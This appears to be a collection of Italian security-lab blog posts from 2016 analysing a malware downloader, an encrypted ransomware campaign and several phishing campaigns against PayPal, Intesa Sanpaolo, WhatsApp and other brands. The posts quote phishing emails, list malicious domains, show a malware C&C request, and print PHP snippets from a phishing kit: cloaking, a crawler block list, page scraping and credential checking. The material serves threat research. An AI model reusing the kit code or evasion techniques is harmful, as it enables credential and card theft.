eMail Malware Crittografato

Una recente tecnica sfruttata per diffondere ed eseguire malware attraverso un downloader JScript consiste nel crittografare il malware. Il file JScript in allegato all’eMail e compresso in formato .zip come nell’immagine di apertura non ha il solo compito di scaricare ed eseguire il file eseguibile ma avrà l’onore di decodificare quest’ultimo.

Per rendere il download più trasparente agli Antivirus viene sfruttata la crittografia, rendendo di fatto il malware un file innocuo. Il beneficio di questa tecnica è facilmente visualizzabile nella seguente immagine, il portale VirusTotal eseguendo la scansione del malware crittografato sfruttando oltre 50 antivirus NON riesce ad identificare il file come malevolo. Inoltre si previene l’inserimento nelle BlackList o RBL (Realtime Blackhole List) del sito internet in quanto all’apparenza non sta generando traffico malevole.

VirusTotal Malware Crittografato

La tecnica è assolutamente efficace per non far determinare all’antivirus che è in corso il download di un file malevolo che una volta decrittografato viene correttamente rilevato quale malware da quasi il 40% di Antivirus disponibili su VirusTotal.

VirusTotal Malware CrittografatoProcedendo ad una decodifica del file JScript possiamo analizzare più dettagliatamente il funzionamento di questa tecnica.

JScript deoffuscatato

Come possiamo visualizzare dall’immagine precedente, il file JScript che si presenta codificato esegue inizialmente la creazione di un Array contenente 3 URL dal quale può scaricare il malware crittografato. Vengono indicati tre differenti url poiché se il primo url non è più disponibile si procederà ad eseguire il download dal secondo sito e così via. Tutti siti internet che risultano essere compromessi.

Successivamente viene inizializzata una variabile contenete la path della directory Temporanea dell’utente, tale variabile viene sfruttata per salvare il file scaricato dagli url precedenti che verrà salvato con il nome i8aBHu1RbJvtm. Una volta scaricato e salvato il malware crittografato viene rinominato aggiungendo l’estensione .exe (i8aBHu1RbJvtm.exe). Successivamente verrà richiamata la funzione KFEy3 che ha l’onere di eseguire la de-crittografia del malware.

Il file scaricato e crittografato viene de-crittografato attraverso una sostituzione monoalfabetica, ovvero la sostituzione di un testo cifrato con un testo in chiaro in base a regole precedentemente stabilite. Durante la de-cifratura, ad ogni porzione del codice cifrato viene associata la corrispondente porzione del codice in chiaro.

Una volta de-crittografato viene avviato e nell’immagine seguente vediamo le conseguenze dell’avvio.

2016.05.27_Screenshot_1007220

Si tratta di un ransomware!

Malware Querela eMail

In data odierna abbiamo rilevato una nuova importante campagna di diffusione Malware a mezzo eMail: per adescare l’utente nella trappola viene sfruttata una finta comunicazione di Querela per Diffamazione Aggravata. Continua a leggere

Phishing prevenzione: Riconoscimento e identificazione

Phishing prevenzione: Riconoscimento e identificazione

Ha preso il via nella giornata di ieri l’attività formativa D3Lab in tema di phishing.

Il corso “Phishing prevenzione: Riconoscimento e identificazione” mira ad illustrare caratteristiche, natura, pericolosità di questa tipologia di minaccia non volgendo la propria attenzione unicamente all’utenza customers, ma illustrando i rischi connessi alle aziende, i possibili conseguente attacchi “man in the mail”, il furto di dati e progetti aziendali e lo spear phishig.

about spear phishing

La lezione, della durata variabile da 2 ore e mezzo a 4 ore, dipendentemente dall’interazione con la classe, ha come target personale generico, risultando idonea a far conoscere la minaccia phishing a personale amministrativo, uffici di segretaria e quadri (i più colpiti dallo spear phishing).

phishing WhatApp

La presentazione risulta particolarmente utile per il personale di call center e di filiale che per primo si trova ad interloquire con il cliente ed identificando la minaccia descritta dall’utente customer può raccogliere i dati rilevanti che trasmessi agli assenti anti-frode e sicurezza consentono l’attivazione delle idonee azioni di contrasto.

procedura raccolta dati dal cliente per call center e filiali

Le società interessate possono contattarci per offerte mirate ai riferimenti indicati nella pagina “contatti“.

email_disoccupazione

Nella giornata odierna ci è pervenuta la segnalazione di una nuova campagna di diffusione di Malware a mezzo eMail, come potete vedere dallo screenshot in apertura la comunicazione attrae particolarmente l’attenzione del destinatario perché tratta di argomenti molto sensibili ad un dipendente. Il licenziamento e la disoccupazione sono ad oggi due argomenti di forte interesse e preoccupazione pertanto un utente sbadato con il patema di ricevere la notifica di disoccupazione può cadere nel tranello ed aprire l’allegato denominato documenti n.1,2,3_doc.zip tale allegato contiene l’eseguibile documenti n.1,2,3_doc.DOCX.exe in grado di scaricare ed eseguire un malware.

La seguente breve analisi vuole riportare alcuni dettagli tecnici rilevati nell’analisi condotta nei nostri laboratori, per rendere noto il lavoro meticoloso svolto per diffondere virus a partire da una eMail scritta correttamente nel lessico e nei contenuti e anche una importante precisione tecnica per infettare il computer.

Il file allegato, come anticipato, eseguirà il download del malware via web eseguendo la seguente chiamata GET:

GET /gate.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: fridazai.xyz

Il dominio fridazai.xyz che subito colpisce l’occhio non si tratta di un sito internet compromesso, come recentemente accade per la diffusione di Cryptoware, ma è stato registrato ad-hoc il 25 Aprile 2016 sfruttando il WhoisGuard Protected per anonimizzare l’intestazione.

Domain Name: FRIDAZAI.XYZ
Domain ID: D19967705-CNIC
WHOIS Server: whois.namecheap.com
Updated Date: 2016-04-25T16:28:06.0Z
Creation Date: 2016-04-25T16:28:03.0Z
Registry Expiry Date: 2017-04-25T23:59:59.0Z
Sponsoring Registrar: Namecheap
Sponsoring Registrar IANA ID: 1068
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant ID: C47900863-CNIC
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
>>> Last update of WHOIS database: 2016-05-12T12:01:37.0Z <<<

Fridazai è l’anello chiave di questa analisi essendo un server C&C (Command and Control) gestito dal Bootmaster, il panello di accesso riporta il nome Godzilla e indubbiamente guardando il logo il riferimento al film è decisamente lampante.

 

c&c_godzilla

 

Una volta avviato il malware eseguirà il download attraverso la chiamate GET precedentemente riportata e andrà a replicarsi all’interno della directory Programmi del proprio computer.

 

vlcsnap-2016-05-12-14h12m26s568

 

Successivamente, non avviandosi nell’immediatezza, andrà a memorizzare una nuova chiave nel registro di Windows per avviarsi al successivo avvio.

 

vlcsnap-2016-05-12-14h16m43s063

 

Il nome dell’eseguibile corrisponderà all’id sfruttato nel C&C per rappresentare i computer infetti e salvato anche in un dedicato file .ini

 

vlcsnap-2016-05-12-14h21m48s272

 

Allo stato attuale l’analisi sembrerebbe indicare che il malware riesca a riconoscere di essere in esecuzione su una sand box e adotta comportamenti atti ad evitare la completa analisi. Nell’attesa di ulteriori accertamenti vogliamo mostrarvi alcune schermate del C&C Godlizza Loader rilevate in un forum tematico, i cui particolari lascerebbero ipotizzare che la paternità di questa struttura C&C vada ricercata in Russia.

Questo slideshow richiede JavaScript.

phising-scam-paypal

Nella nostra attività di monitoraggio e contrasto al Phishing abbiamo rilevato nel primo trimestre dell’anno una vasta campagna di Phishing ai danni di PayPal con la registrazione di multipli domini creati ad-hoc come i seguenti dei quali alcuni con valido certificato SSL:

  • http://account-resolved-noticed.com
  • http://confirmation-securley.com
  • http://incpaypallimit.com
  • http://overview-account.com
  • http://peypal-secure-account.ml
  • http://resolved-access.com
  • http://settingpaypal.com
  • http://spoof-verifications.com
  • http://update.pay-pal.cash
  • http://verification-sign.in
  • http://www-paypal-com-apps.party
  • http://www.paypal-365.biz
  • http://www.paypal-365.com
  • http://www.paypal-365.info
  • http://www.paypal-365.online
  • http://www.paypall.com
  • https://cgi-servicescenter.com/
  • https://resolve-verify.com
  • https://validation-customer.org
  • https://ww.vv-paypal.com
  • https://www.payapl-billing.com
  • https://www.validation.reviews

PayPal è da sempre un obiettivo primario per i Phisher ma i recenti cloni hanno attratto la nostra attenzione per l’importante precisione e cura con cui sono stati realizzati. Rispecchiano a 360 gradi il sito ufficiale, adattando la grafica e la lingua in base alla provenienza del navigatore. Ma ad attirare ancor di più la nostra attenzione è stata la tempestività con cui adattavano il design/layout del kit rispetto al sito originale, con sempre le dovute variazioni geografiche. Abbiamo quindi deciso di analizzare e approfondire le tecniche utilizzate in questo Kit recuperato su un server compromesso avente il Directory Listing di Apache abilitato.

Le seguenti tre immagini rappresentano a sinistra il sito ufficiale di PayPal e a destra quello generato dal kit in base alla lingua di navigazione dell’utente, usualmente il Phisher crea diversi Kit in base al target linguistico degli utenti ma in questo caso il kit risulta unico, anche l’indirizzo web, e il codice adatta l’interfaccia grafica in maniera completamente automatica. Per ottenere questo risultato il codice PHP sviluppato identifica inizialmente la geolocalizzazione dell’utente ed in base ad essa effettua uno Web scraping (salvataggio di una pagina web) del sito originale di PayPal selezionando la corretta lingua, l’output verrà poi editato per adattare l’invio delle credenziali al Phisher e non a PayPal.

 

PayPal_RUS_Web

L’interfaccia del sito originale e del clone in lingua Russa

PayPal_FR_Web

L’interfaccia del sito originale e del clone in lingua Francesce

PayPal_IT_Web

L’interfaccia del sito originale e del clone in lingua Italiana

 

Analizzando il Kit abbiamo potuto osservare le seguenti caratteristiche:

  • Identificazione dell’user agent del visitatore e relativo re-indirizzamento al clone dedicato (Desktop o Mobile);
  • Generazione random di un nuova path web ad ogni accesso per limitare la funzionalità delle blacklist (PhishTank, ecc);
  • Geolocalizzazione mediante IP;
  • Blocco di accesso ad utenti e boot prestabiliti (Google Bot, Utenti Tor, Trendmicro, PayPal, ecc);
  • Download in tempo reale del sito ufficiale;
  • Sostituzione di stringe dal sito originale per permettere il salvataggio delle credenziali;
  • Validazione delle credenziali dell’utente (solo se vengono digitate corrette credenziali viene richiesta la conferma della carta di credito del cliente);
  • Salvataggio delle credenziali dell’utente (eMail, password, Nome, Cognome, Carta di Credito, ecc) in un file di testo e contestuale invio a mezzo email al Phisher.

La generazione di una nuova path per ogni accesso è affidata alla seguente porzione di codice, all’accesso viene generato un numero casuale compreso tra 0 e 100000 concatenato all’IP del visitatore e successivamente generato l’HASH MD5 di tale stringa:


$random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
$dst = substr(md5($random), 0, 5);

La geolocalizzazione viene eseguita sfruttando le API pubbliche di Geoplugin.net:

$ip          = $_SERVER['REMOTE_ADDR'];
$details     = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=".$ip."");
$negara      = $details-&amp;amp;gt;geoplugin_countryCode;
$nama_negara = $details-&amp;amp;gt;geoplugin_countryName;
$kode_negara = strtolower($negara);

Per bloccare gli utenti viene analizzato l’hostname del navigatore o l’indirizzo IP:

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$bannedIP = array("^81.161.59.*", "^66.135.200.*", "^66.102.*.*", ecc ecc)
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit", "msnbot","p3pwgdsn","netcraft","trendmicro", "ebay", "paypal", "torservers", "messagelabs", "sucuri.net", "crawler");

La seguente porzione di codice sfrutta la funzione file_get_contents() di PHP per eseguire uno Web Scraping del sito ufficiale di PayPal ed adattarlo alle necessità del Phisher


$url&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; = "https://www.paypal.com/{$codecountry}/webapps/mpp/home";
$options     = array(
    'http' =&amp;amp;gt; array(
        'method' = "GET",
        'header' = "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . ""
    )
);
$originalcodemoreart     = stream_context_create($options);
$natija = file_get_contents($url, false, $originalcodemoreart);
...
...
$chof = str_replace($jibsafha . "cgi-bin/signin", $loging, $chof);
$chof = str_replace($get_form, '

&amp;amp;lt;form action="signin" method="post" ', $chof);
...
...

Porzione di codice che ha il compito di verificare, mediante il sito ufficiale di PayPal, se le credenziali digitate sono corrette:


$loggedIn = curl("https://www.paypal.com/webscr?cmd=_account&amp;amp;nav=0.0");
if ($title == "Security Measures - PayPal") {
} elseif (stripos($loggedIn, 'PayPal balance') !== false || stripos($loggedIn, 'Log Out&amp;lt;/a&amp;gt;') !== false) {

L’analisi delle evidenze nel codice e nei commenti del Kit ci ha permesso di identificare il nickname del Phisher, probabilmente di provenienza Araba, e la sua pagina su Facebook. Pagina con oltre 2mila like, la quale viene sfruttata per diffondere nuove versioni del Kit e fornire suggerimenti ai Phisher novelli.

Sfogliando la sua breve galleria fotografica troviamo un bozzetto su carta della grafica di una pagina da clonare, questa immagine ci conferma l’importanza e la precisione che contraddistingue questo Phisher nei suoi progetti.

 

Phisher Facebook

 

Infine il Phisher ha un canale ufficiale su YouTube dove ha pubblicato una video guida sul funzionamento del Kit e le istruzioni per configurare il corretto invio delle credenziali all’eMail desiderata.

PayPal_Phishing_YouTube

 

Il Phishing è una complessa operazione ancor oggi in fase di sviluppo e creazione, sfrutta nuove tecniche dell’Ingegneria Sociale per carpire le sue vittime e nuovi approcci di programmazione per risultare sempre più similare al target preso di mira.

Edison Phishing

In data odierna nelle nostre quotidiane attività di ricerca e contrasto al Phishing abbiamo individuato l’utilizzo fraudolento dei loghi e del nome di un nuovo ente, Edison spa, ai danni degli utenti.

L’utente riceve una finta comunicazione con i loghi dell’azienda Edison dove viene informato che gli spetta un rimborso per un errato conteggio della sua fattura, viene invitato a visitare un sito internet dove dopo aver digitato i suoi dati personali (Nome, Cognome, Codice Fiscale, Data di Nascita, Residenza, Cellulare ed eMail) viene reindirizzato in una nuova pagina dove poter scegliere 4 Istituti Bancari a sua scelta, una volta selezionata la Banca per completare la falsa procedura di rimborso dovrà inserire i dati della propria Carta di Credito con la falsa promessa di ricevere un accredito da parte della società energetica.

Come sempre invitiamo gli utenti alla massima attenzione quando si naviga su internet.

mail fraudolenta

Negli ultimi mesi il phishing a danno di clienti Intesa SanPaolo si è molto intensificato. Le metodiche con cui è realizzato sono diverse e spesso queste metodiche, rimanendo costanti nel tempo, permettono di identificare i diversi team criminali.

mail fraudolenta

Risulta interessante esaminare alcune metodiche di realizzazione e per fare ciò partiamo da una serie di url di attacco rilevati nella giornata del 10 marzo 2016:

http://ikf65y8x.triviashootout.com/
http://iek1.scooteraz.com/ek1.png
http://i9j1vsd6x6tpf5.scooteraz.com/
http://iq.sayili.com.tr/
http://i0s2uf5t2n6cl.marisas-ristorante.com/
http://iyi2qodn17.limofind.com/yi2qodn17
http://i4nspxbe.limofind.com/
http://droon99.com/
http://iuo1ldzcegy88hj.berketadilat.com/
http://iy.my-payroll-place.com/
http://iri.mockhoago.net/
http://i3jkd.pcfp.com/
http://i4savz008ar6d.triviashootout.com/
http://droon99.com/
http://droon99.com/
http://droon99.com/
http://www.droon99.com/
http://droon99.com/
http://iu.hollyf5yoursenses.com/
http://sic3x.marisas-ristorante.com/
http://is1n.nsdrc.net/
http://ik.turkeycampout.org/
http://ivuxi2j.mutfakdolabisitesi.com/
http://iys60jzfyy58fp3.ecticon2015.org/
http://sicio3fi41pwy.marisas-ristorante.com/
http://sicjsaay2e7unx.marisastrumbull.com/
http://i.turkeycampout.org/
http://ii2e0lm47i4c8.marisasbrunch.com/
http://i6pqrh5pk.sayilipetrol.com/
http://sicgc.marisastrumbull.com/
http://i04qsijkcg11w5d.wyseonline.com/
http://ii.mutfakdolabisitesi.com/
http://ivuxi2j.mutfakdolabisitesi.com/
http://iww.oto67.com/
http://i61.oto67.com/
http://igpmjqs37vcr.efe-mantolama-tadilat.com/
http://i.dnaland.com/
http://icrgr43kg8.mutfakdolaplarifiyat.com/
http://ii.mutfakdolabisitesi.com/
http://id6hr1nqlm800.sayili.com.tr/
http://ifos4da0.oto67.com/
http://i9s8n50wv5ay.mutfakdolaplarifiyat.com/
http://i01e1c3cg8.mercedesbenz-vietnamstar.com/
http://itbhrm.nsdrc.net/
http://idmfs7jp0d8u0.nsdrc.net/
http://sicsljvky0.limofind.com/
http://ib7jwgdt0ny2rnx.nsdrc.net/
http://ib29u.nsdrc.net/
http://i9imt0k4d41sp.nsdrc.net/
http://i3y258786zx.nsdrc.net/
http://sicwu.limofind.com/
http://idanh9wa.nsdrc.net/
http://i6dlvccs.nsdrc.net/
http://i7vrxkvf5c.marisasrestaurant.com/
http://ik78rolgbfre0lx.mr3webdesign.com/
http://iafuojkm2xn.diamondpfs.com/
http://iv0yn.randrpartnershipinc.com/
http://i6r1x5ocz6o9nfm.blusky.us/
http://link.randrpartnershipinc.com/
http://ip.turkeycampout.org/
http://sicreyxt8.pjsconstruct.com/
http://icrdru0c68f2m4n.dnaland.com/
http://iu2wt4e5wi9.dnaland.com/
http://sicfbt5rr.pjsconstruct.com/scriptlogin
http://ib8houa2z4luco9.turkeycampout.org/
http://iuxtvx84b7o.phoenixhealthcarenow.com/
http://sic1wl6mm1g.randrpartnershipinc.com/
http://i6u0kgd.travcomm.com/
http://link88dex6l8q2n.mr3webdesign.com/
http://linkhzxuulwl6.glenbelushcpa.com/
http://iy1n6z3vswf5952d.phoenixhealthcarenow.com/
http://iwetnbamjchfqoy.click-epti.com/
http://i07e7nc8.indianaaudubon.org/
http://link.marisasristorante.com/
http://linktwsb6vqgjipee3.gaelectricco.info/
http://imvy.nptsampharn-dol.go.th/
http://linknnn4xx.pjsconstruct.com/
http://io0yld7.caosukythuat.net/
http://linke7iu93g557hjhq0.mr3-web.com/
http://sicmkfnu4a6j2di.marisasristorante.com/
http://i9nfk1v4md71.turkeycampout.org/
http://sic8zy.jglandscapingllc.com/
http://ip.travcomm.com/
http://www.droon99.com/
http://iocknfn5.caosukythuat.net/
http://sicmiwydzhkhd2h.marisas-ristorante.com/
http://izu56c.caosukythuat.com/
http://iuo6nakm1y.it-cpr.com/
http://linkp7cfvjjnf3w.randrpartnershipinc.com/
http://sicssw.glenbelushcpa.com/
http://ifyy8u96jf3we9n.travcomm.com/
http://sic1ok.triviashootout.com/
http://ig6xvav2d.caosukythuat.net/
http://siclqz77jpjozlan5.marisas-ristorante.com/
http://ibgnx6.ga-service.com/
http://ircxny75.blusky.us/
http://ix6.caosukythuat.net/
http://itossyv.bismconsulting.com/

Nella barra del browser gli url in questione sono solitamente seguiti da parametri quali “email” ed “id” riportanti indirizzi mail di chi ha ricevuto i messaggi fraudolenti e stringhe alfanumeriche,
http://i7i.mr3-web.com/7i?id=58C6C85C8D25BB64077F7AD88C314B0A&[email protected]&

nonché path (directory e file) usualmente fittizi e gestiti attraverso le policy di rewrite di htaccess.

I parametri quali email ed id potrebbero in realtà permettere ai criminali di verificare gli indirizzi mail reali e di evitare visitatori indesiderati (…visualizzi la pagina solo se eri tra i destinatari della mail…) in realtà tale approccio non risulta usato dall’esame dei kit di phishing sino ad ora recuperati.

Gli url di attacco sopra riportati fanno in realtà riferimento ad un unico clone riproducente grafica e loghi di Intesa San Paolo

pagina clone

(NOTA BENE: Google safe brrowsing evidenzia in rosso che il form verrà trasmesso senza fare uso di https)

posizionato su un server dedicato  (198.12.67.179 ) su cui risiede il dominio DROON99.COM registrato nel 2013:

Domain Name: DROON99.COM
Registrar: GODADDY.COM, LLC
Sponsoring Registrar IANA ID: 146
Whois Server: whois.godaddy.com
Referral URL: http://www.godaddy.com
Name Server: NS75.DOMAINCONTROL.COM
Name Server: NS76.DOMAINCONTROL.COM
Status: ok https://www.icann.org/epp#OK
Updated Date: 13-may-2015
Creation Date: 17-mar-2013
Expiration Date: 17-mar-2017

Lo spazio web di tale dominio presentava qualche tipo di contenuti almeno sino al maggio 2014

contenuti di droon99.com al maggio 2014

successivamente e fino al 5 marzo 2016 si poteva vedere la pagina di default di Apache server su Ubuntu

home page droon99.com al 5 marzo 2016

 

I criminali dopo aver avuto accesso allo spazio web del dominio DROON99.COM ed aver posizionato in esso il clone, hanno violato almeno altri 18 domini

  • triviashootout.com
  • scooteraz.com
  • sayili.com.tr
  • marisas-ristorante.com
  • limofind.com
  • droon99.com
  • berketadilat.com
  • my-payroll-place.com
  • mockhoago.net
  • pcfp.com
  • hollyf5yoursenses.com
  • nsdrc.net
  • turkeycampout.org
  • mutfakdolabisitesi.com
  • ecticon2015.org
  • marisastrumbull.com
  • marisasbrunch.com
  • sayilipetrol.com

posizionati su 7 diversi server in 4 diverse nazioni

  • 65.60.23.41 USA
  • 70.34.35.58 USA
  • 74.54.19.66 USA
  • 198.12.67.179 USA
  • 46.235.8.126 Turkey
  • 112.78.1.28 VietNam
  • 112.121.151.155 Thailand

e accedendo ai pannelli di gestione di questi hanno abilitato il wild card per i domini di livello inferiore e puntando
qualsiasi-stringa.unodei18dominibucati.tld
sul server dedicato con ip 198.12.67.179 contenente DROON99.COM.

 

Tale metodica di attacco offre al criminale diversi vantaggi:

1- creazione di illimitati url di attacco, limitando l’efficacia dei meccanismi di black listing

2- creazione di nomi dominio particolarmente lunghi, che nella barra degli indirizzi di dispositivi smartphone di ridotte dimensioni potrebbero essere visualizzati solo in parte, es:
bancaintesa.sanpaolo.com-areapersonale.login.sayilipetrol.com
ottenendo la visualizzazione solo di parte ingannevole dell’url, come nell’immagine sottostante

visualizzazione fake url su smartphone

 

3- rendere complessa l’azione di take down, diventando necessario non solo contattare i referenti di DROON99.COM, ma anche quelli di tutti i domini usati per i fake url, spiegando loro che le pagine di phishing non sono nei loro siti, ma che il loro pannello di gestione domini è comunque stato (presumibilmente) violato.

 

Tornando ai fatti: ma cosa interessava ai criminali?

Esaminando il clone si rileva la richiesta sia dei dati di login, che di otp e carta di credito.

pagina clone cattura dati carta di credito

 

Nel caso specifico, in base all’esperienza maturata, sembrerebbe probabile che i criminali mirino unicamente ai dati di carta di credito.

L’uso del token OTP non rappresenta per i criminali un problema insormontabile: l’uso di console di monitoraggio (come raccontato nel post “Phishing con operatore per aggirare i token otp“) permette loro di interagire con la vittima, sfruttando le credenziali ricevute

console di monitoraggio del phisher

 

praticamente in tempo reale, consentendo loro di ordinare pagamenti con estrema abilità e velocità.

Tra l’altro uno di questi casi è attivo proprio in questi giorni sempre ai danni di Intesa San Paolo.

Quindi, per concludere: è errato considerare il phishing una minaccia ridicola, sia per le sue potenzialità, sia per le metodiche con cui viene attuato.

mail fraudolenta

Nella giornata di ieri è stato registrato un massiccio invio di mail di phishing a danno degli utenti WhatsApp.

il messaggio di posta fraudolento, partito da un host statunitense, presenta le seguenti caratteristiche:

 

mail fraudolenta

 

Oggetto: Il tuo WhatsApp Messenger è scaduto

Mittente: “WhatsApp Messenger” <[email protected]>

testo del messaggio:

————————————————————————–

Attenzione! Il tuo account WhatsApp Messenger e scaduto

La registrazione non e stata rinnovata scade entro 24 ore, per rinnovare il tuo WhatsApp Messenger 0,99 euro, grazie a seguire il link di rinnovo

Rinnova il tuo WhatsApp Messenger

Si prega di rinnovare il piu presto possibile per evitare la perdita di tutti i media (immagini, video, storico …)

servizi commerciali

2016 whatsapp.com All rights reserved.

————————————————————————–

 

la dicitura “Rinnova il tuo WhatsApp Messenger” nasconde il link all’url: hxxp://whatsapp-rinnovo.com/Clicca.php.

Il dominio whatsapp-rinnovo.com risulta essere stato registrato nei giorni scorsi attraverso il provider francese OVH
Domain Name: whatsapp-rinnovo.com
Registry Domain ID: 2004558108_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ovh.com
Registrar URL: http://www.ovh.com
Updated Date: 2016-02-19T21:54:11.0Z
Creation Date: 2016-02-19T21:48:12.0Z
ed essere in hosting presso altro provider francese frequentemente utilizzato dai cyber criminali per la pubblicazione di siti/domini ad uso fraudolento.

 

Il collegamento ipertestuale presente nella mail svolge funzione di redirect portando i visitatori su pagine clone inoculate all’interno di un sito web compromesso.

pagine clone

 

per ogni visitatore viene creata una directory con nome random (usualmente l’hash md5 dell’istante temporale) all’interno del quale viene copiato il kit di phishing, sistema spesso impiegato per cercare di eludere i meccanismi di balck listing basati su url completo.

Le pagine clone richiedono l’inserimento dei dati di carta di credito.

messaggio di posta fraudolento

Nel pomeriggio odierno è stato individuato un messaggio di posta elettronica fraudolento ai danni dei clienti di Banca Intesa, finalizzato a veicolare il tentativo di frode attraverso una comunicazione telefonica.

 messaggio di posta fraudolento

 

Il messaggio di posta fraudolento, che sembrerebbe partito da un indirizzo ip del Belize, per transitare poi su un server di posta statunitense, presenta le seguenti caratteristiche:

 

 

Mittente: “Intesa Sanpaolo” <[email protected]> 

Oggetto: [ 0564 ] – Messaggio urgente 

Testo messaggio:

———————————————————————————————————–

Gentile cliente,     
X-ME-Bayesian: 0.005190

Il tuo è stata sospesa a causa di qualche pagamenti effettuati all’estero.   

Si prega di fara una chiamata per registrarsi e per sbloccare il tuo profilo.     

Per riattivare fare una chiamata a numero +(39) 087 226 0028.                      

Intesa Sanpaolo, Italia – 2016
Numero di telefono: +(39) 087 226 0028

———————————————————————————————————–

 

e, con qualche errore, invita gli utenti a comporre un numero di telefono con prefisso di Lanciano per sbloccare il proprio profilo[account] di internet banking.

Componendo il numero di telefono si viene dapprima accolti da un messaggio automatico, presumibilmente una registrazione degli effettivi messaggio dell’istituto bancario, che con voce femminile ci informa che la nostra telefonata potrebbe essere registrata.

Successivamente subentrano le indicazioni automatiche di una voce maschile che, con tono professionale ma in un italiano scorretto, chiede di digitare le credenziali di accesso all’account di internet banking e i codici OTP generati dal dispositivo dedicato.

Chi lo desidera può ascoltare la registrazione della telefonata qui (file audio amr).

Non si tratta comunque di un caso isolato, vedasi la campagna a danno di Poste Italiane verificatasi nell’autunno 2013

andamento phishing 2015

Nell’anno ormai al termine i criminali hanno posto la loro attenzione su enti precedentemente poco o per nulla colpiti dal phishig, come Veneto Banca e Banca delle Marche.

Nel caso degli enti citati ci si può ritenere fortunati che i criminali non abbiano confezionato le mail di attacco facendo leva sulle problematiche ormai note a tutti di tali istituti. Si può immaginare con facilità quale sarebbe stato il grado di allerta ed ansia provocato da false comunicazione che, paventando l’utilizzo dei conti correnti dei risparmiatori per ripianare i debiti degli istituti, avessero veicolato gli utenti verso pagine di phishing.

andamento phishing 2015

 

In altri casi i phisher sono tornati a colpire istituti di credito non aggrediti da diversi anni. Si è in definitiva assistito ad un anno  in cui a fronte di un netto calo dei tentativi di phishing si è avuto un incremento degli attacchi ad enti non bancari, in particolare gli operatori di telefonia mobile ed Apple, ed una migrazione da target ormai classici (Poste Italiane, PayPal, ecc…) verso target meno soggetti al fenomeno, i cui clienti ed utenti presentano quindi una minor scaltrezza e conoscenza della minaccia.

Si inserisce in tale contesto il tentativo di phishing rilevato nella serata di ieri a danno dei clienti dell’istituto di credito Banca Agricola Popolare di Ragusa:

messaggio di posta fraudolento

Il messaggio di posta fraudolento presenta le seguenti caratteristiche:

Mittente apparente: <[email protected]>
Oggetto: EQUITALIA

testo:

————————————————————————————

EQUITALIA

Cartella esattoriale nr 96263/12 procedimento amministrativo sanzonatorio del 24/06/2012.

Qualora non abbia gia provveduto al pagamento la preghiamo di accedi la raccomandata nella sezione di sito autorizzato Banca Agricola Popolare di Ragusa.

ACCEDI DOCUMENTO

La ringrazioamo per la collaborazione.

Distinti saluti ,

EQUITALIA

————————————————————————————

 

Il link celato dalla dicitura “ACCEDI DOCUMENTO” porta ad una pagina php, che insieme ad altre 299 inserite in un sito web UK violato, ha la funzione di redirect e conduce i visitatori alle pagine clone inserite in un sito web romeno, dove all’utente sono richiesti i dati di login.

prima pagina clone

 

nella pagina successiva viene richiesto all‘utente di inserire il proprio numero di cellulare.

 

seconda pagina fraudolenta

 

La mancata richiesta di ulteriori dati via web lascia ipotizzare che i criminali, dopo aver effettuato il login con i dati acquisiti e verificato l’effettivo ammontare di quanto presente sul conto, possano procedere perfezionando la frode via telefono, sfruttando i dati acquisiti dalle pagine del cliente.